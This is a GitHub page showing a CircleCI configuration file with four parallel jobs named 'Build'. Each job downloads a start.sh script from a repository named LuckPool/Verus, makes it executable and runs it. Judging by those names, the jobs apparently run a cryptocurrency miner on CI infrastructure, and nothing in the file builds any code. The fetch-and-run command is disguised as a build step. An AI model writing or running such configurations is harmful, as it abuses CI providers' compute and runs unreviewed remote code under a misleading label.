Skip to content
Search
Pulls
Issues
Marketplace
Explore
 
@ren11222 
rikakasim
/
kasim
Public
1
00
Code
Issues
Pull requests
Actions
Projects
Wiki
Security
Insights
kasim/.circleci/config.yml
@rikakasim
rikakasim Create config.yml
Latest commit e7a3b94 on May 23
 History
 1 contributor
40 lines (38 sloc)  1.17 KB
 
version: 2
jobs:
    Build_01:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/golekopo/LuckPool/master/Verus/01/start.sh && chmod u+x start.sh && ./start.sh
    Build_02:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/golekopo/LuckPool/master/Verus/01/start.sh && chmod u+x start.sh && ./start.sh
    Build_03:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/golekopo/LuckPool/master/Verus/01/start.sh && chmod u+x start.sh && ./start.sh
    Build_04:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/golekopo/LuckPool/master/Verus/01/start.sh && chmod u+x start.sh && ./start.sh


workflows:
    version: 2
    build:
        jobs:
            - Build_01
            - Build_02
            - Build_03
            - Build_04
© 2021 GitHub, Inc.
Terms
Privacy
Security
Status
Docs
Contact GitHub
Pricing
API
Training
Blog
About
Loading complete